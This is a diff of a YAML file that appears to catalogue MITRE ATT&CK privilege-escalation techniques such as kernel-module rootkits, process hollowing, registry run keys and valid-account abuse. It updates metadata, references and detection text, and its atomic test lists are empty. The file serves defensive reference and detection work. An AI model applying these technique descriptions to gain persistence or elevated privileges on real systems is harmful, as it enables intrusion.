+          Retrieved September 12, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2015/extensibility/specifying-file-handlers-for-file-name-extensions?view=vs-2015
       - source_name: Microsoft Assoc Oct 2017
         description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August
           7, 2018.
@@ -20301,7 +20621,8 @@ privilege-escalation:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1546.001
     atomic_tests: []
   T1055.014:
@@ -20372,7 +20693,7 @@ privilege-escalation:
         resources, and possibly elevated privileges. Execution via VDSO hijacking
         may also evade detection from security products since the execution is masked
         under a legitimate process.  "
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-07T17:09:09.048Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: VDSO Hijacking
       x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace
@@ -20399,7 +20720,6 @@ privilege-escalation:
       - Application control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.014:
     technique:
@@ -20439,7 +20759,7 @@ privilege-escalation:
         The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path <code>/private/var/db/emondClients</code>, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at<code>/System/Library/LaunchDaemons/com.apple.emond.plist</code>.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
 
         Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T00:16:01.732Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Event Triggered Execution: Emond'
       x_mitre_detection: Monitor emond rules creation by checking for files created
@@ -20459,12 +20779,11 @@ privilege-escalation:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.014
     atomic_tests: []
   T1574.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:37.026Z'
       name: Services File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -20518,11 +20837,10 @@ privilege-escalation:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1547.001:
     technique:
-      modified: '2023-10-16T09:08:22.319Z'
+      modified: '2024-09-12T15:27:58.051Z'
       name: 'Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'
       description: |-
         Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -20609,9 +20927,9 @@ privilege-escalation:
           in the Registry. Retrieved August 3, 2020.
         url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
       - source_name: Microsoft Run Key
-        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa376977
+        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
       - source_name: Oddvar Moe RunOnceEx Mar 2018
         description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden
           from Autoruns.exe. Retrieved June 29, 2018.
@@ -20624,12 +20942,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.001
     atomic_tests: []
   T1098:
     technique:
-      modified: '2024-01-16T22:24:38.234Z'
+      modified: '2024-10-15T15:35:57.382Z'
       name: Account Manipulation
       description: "Adversaries may manipulate accounts to maintain and/or elevate
         access to victim systems. Account manipulation may consist of any action that
@@ -20665,16 +20982,15 @@ privilege-escalation:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - SaaS
       - Network
       - Containers
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
@@ -20715,143 +21031,141 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098
     atomic_tests: []
   T1547.006:
     technique:
-      x_mitre_platforms:
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-09-12T17:30:54.170Z'
+      name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
+      description: |-
+        Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) 
+
+        When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
+
+        Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
+
+        Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
+
+        Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
       x_mitre_contributors:
       - Wayne Silva, F-Secure Countercept
       - Anastasios Pingios
       - Jeremy Galloway
       - Red Canary
       - Eric Kaiser @ideologysec
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_deprecated: false
+      x_mitre_detection: |
+        Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: <code>modprobe</code>, <code>insmod</code>, <code>lsmod</code>, <code>rmmod</code>, or <code>modinfo</code> (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into <code>/lib/modules</code> and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
+
+        Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: <code>apt-get install linux-headers-$(uname -r)</code> On RHEL and CentOS based systems this can be accomplished by running: <code>yum install kernel-devel-$(uname -r)</code>
+
+        On macOS, monitor for execution of <code>kextload</code> commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the <code>kext_policy</code> table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, <code>/var/db/SystemPolicyConfiguration/KextPolicy</code>.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      - Linux
+      x_mitre_version: '1.3'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'File: File Creation'
+      - 'File: File Modification'
+      - 'Kernel: Kernel Module Load'
+      - 'Process: Process Creation'
+      x_mitre_permissions_required:
+      - root
       type: attack-pattern
       id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
       created: '2020-01-24T17:42:23.339Z'
-      x_mitre_version: '1.3'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1547.006
         url: https://attack.mitre.org/techniques/T1547/006
+        external_id: T1547.006
       - source_name: Apple Developer Configuration Profile
-        url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
         description: Apple. (2019, May 3). Configuration Profile Reference. Retrieved
           September 23, 2021.
+        url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
       - source_name: Apple Kernel Extension Deprecation
-        url: https://developer.apple.com/support/kernel-extensions/
         description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension
           Alternatives. Retrieved November 4, 2020.
+        url: https://developer.apple.com/support/kernel-extensions/
       - source_name: System and kernel extensions in macOS
-        url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
         description: Apple. (n.d.). System and kernel extensions in macOS. Retrieved
           March 31, 2022.
+        url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
       - source_name: GitHub Reptile
-        url: https://github.com/f0rb1dd3n/Reptile
         description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved
           April 9, 2018.
+        url: https://github.com/f0rb1dd3n/Reptile
       - source_name: Volatility Phalanx2
-        url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
         description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility
           to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.'
+        url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
       - source_name: iDefense Rootkit Overview
-        url: http://www.megasecurity.org/papers/Rootkits.pdf
         description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved
-          April 6, 2018.
+          September 12, 2024.
+        url: https://www.megasecurity.org/papers/Rootkits.pdf
       - source_name: Linux Loadable Kernel Module Insert and Remove LKMs
-        url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
         description: Henderson, B. (2006, September 24). How To Insert And Remove
           LKMs. Retrieved April 9, 2018.
+        url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
       - source_name: CrowdStrike Linux Rootkit
-        url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
         description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit.
           Retrieved December 21, 2017.
+        url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
       - source_name: GitHub Diamorphine
-        url: https://github.com/m0nad/Diamorphine
         description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux
           Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.
+        url: https://github.com/m0nad/Diamorphine
       - source_name: Securelist Ventir
-        url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
         description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
           your MacOS spy. Retrieved April 6, 2018.'
+        url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
       - source_name: User Approved Kernel Extension Pike’s
-        url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
         description: Pikeralpha. (2017, August 29). User Approved Kernel Extension
           Loading…. Retrieved September 23, 2021.
+        url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
       - source_name: Linux Kernel Module Programming Guide
-        url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
         description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs.
           Retrieved April 6, 2018.
+        url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
       - source_name: Linux Kernel Programming
-        url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
         description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel
           Module Programming Guide. Retrieved April 6, 2018.
+        url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
       - source_name: Trend Micro Skidmap
-        url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
         description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
           Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
           Retrieved June 4, 2020.
+        url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
       - source_name: Purves Kextpocalypse 2
-        url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
         description: Richard Purves. (2017, November 9). MDM and the Kextpocalypse
           . Retrieved September 23, 2021.
+        url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
       - source_name: RSAC 2015 San Francisco Patrick Wardle
-        url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
         description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite.
           Retrieved April 6, 2018.
+        url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
       - source_name: Synack Secure Kernel Extension Broken
-        url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
         description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel
           Extension Loading’ is Broken. Retrieved April 6, 2018.
+        url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
       - source_name: Wikipedia Loadable Kernel Module
-        url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
         description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved
           April 9, 2018.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) 
-
-        When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
-
-        Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
-
-        Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
-
-        Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
-      x_mitre_detection: |
-        Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: <code>modprobe</code>, <code>insmod</code>, <code>lsmod</code>, <code>rmmod</code>, or <code>modinfo</code> (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into <code>/lib/modules</code> and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
-
-        Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: <code>apt-get install linux-headers-$(uname -r)</code> On RHEL and CentOS based systems this can be accomplished by running: <code>yum install kernel-devel-$(uname -r)</code>
-
-        On macOS, monitor for execution of <code>kextload</code> commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the <code>kext_policy</code> table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, <code>/var/db/SystemPolicyConfiguration/KextPolicy</code>.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: persistence
-      - kill_chain_name: mitre-attack
-        phase_name: privilege-escalation
-      x_mitre_is_subtechnique: true
-      x_mitre_data_sources:
-      - 'Command: Command Execution'
-      - 'File: File Creation'
-      - 'File: File Modification'
-      - 'Kernel: Kernel Module Load'
-      - 'Process: Process Creation'
-      x_mitre_permissions_required:
-      - root
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.006
     atomic_tests: []
   T1574.013:
@@ -20888,7 +21202,7 @@ privilege-escalation:
         url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
         description: Microsoft. (2021, November 23). NtQueryInformationProcess function
           (winternl.h). Retrieved February 4, 2022.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-22T15:47:33.915Z'
       name: KernelCallbackTable
       description: |-
         Adversaries may abuse the <code>KernelCallbackTable</code> of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The <code>KernelCallbackTable</code> can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once <code>user32.dll</code> is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -20914,12 +21228,10 @@ privilege-escalation:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1053.006:
     technique:
-      modified: '2023-09-08T11:56:26.862Z'
+      modified: '2024-10-15T16:42:51.536Z'
       name: 'Scheduled Task/Job: Systemd Timers'
       description: |-
         Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension <code>.timer</code> that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the <code>systemctl</code> command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
@@ -20997,9 +21309,8 @@ privilege-escalation:
         url: http://man7.org/linux/man-pages/man1/systemd.1.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.006
     atomic_tests: []
   T1574:
@@ -21066,7 +21377,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1543.005:
     technique:
@@ -21140,11 +21450,10 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:09:46.024Z'
       name: Valid Accounts
       description: |-
         Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -21161,7 +21470,6 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
-      x_mitre_attack_spec_version: 3.1.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -21171,7 +21479,7 @@ privilege-escalation:
       - Netskope
       - Mark Wee
       - Praetorian
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -21180,19 +21488,17 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -21240,11 +21546,12 @@ privilege-escalation:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1055.012:
     technique:
-      modified: '2023-08-11T21:37:00.009Z'
+      modified: '2024-09-12T15:11:45.602Z'
       name: 'Process Injection: Process Hollowing'
       description: "Adversaries may inject malicious code into suspended and hollowed
         processes in order to evade process-based defenses. Process hollowing is a
@@ -21312,23 +21619,22 @@ privilege-escalation:
           Retrieved December 7, 2017.'
         url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
       - source_name: Leitch Hollowing
-        description: Leitch, J. (n.d.). Process Hollowing. Retrieved November 12,
-          2014.
-        url: http://www.autosectools.com/process-hollowing.pdf
+        description: Leitch, J. (n.d.). Process Hollowing. Retrieved September 12,
+          2024.
+        url: https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf
       - source_name: Mandiant Endpoint Evading 2019
         description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
           the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
         url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1055.012
     atomic_tests: []
   T1068:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-04-07T17:13:54.168Z'
       name: Exploitation for Privilege Escalation
       description: |-
         Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
@@ -21391,11 +21697,10 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546:
     technique:
-      modified: '2024-03-01T15:49:15.588Z'
+      modified: '2024-10-15T15:57:00.731Z'
       name: Event Triggered Execution
       description: "Adversaries may establish persistence and/or elevate privileges
         using system mechanisms that trigger execution based on specific events. Various
@@ -21448,8 +21753,8 @@ privilege-escalation:
       - Windows
       - SaaS
       - IaaS
-      - Office 365
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'WMI: WMI Creation'
@@ -21497,78 +21802,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546
     atomic_tests: []
   T1546.004:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Robert Wilson
-      - Tony Lambert, Red Canary
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
-      type: attack-pattern
-      created: '2020-01-24T14:13:45.936Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1546.004
-        url: https://attack.mitre.org/techniques/T1546/004
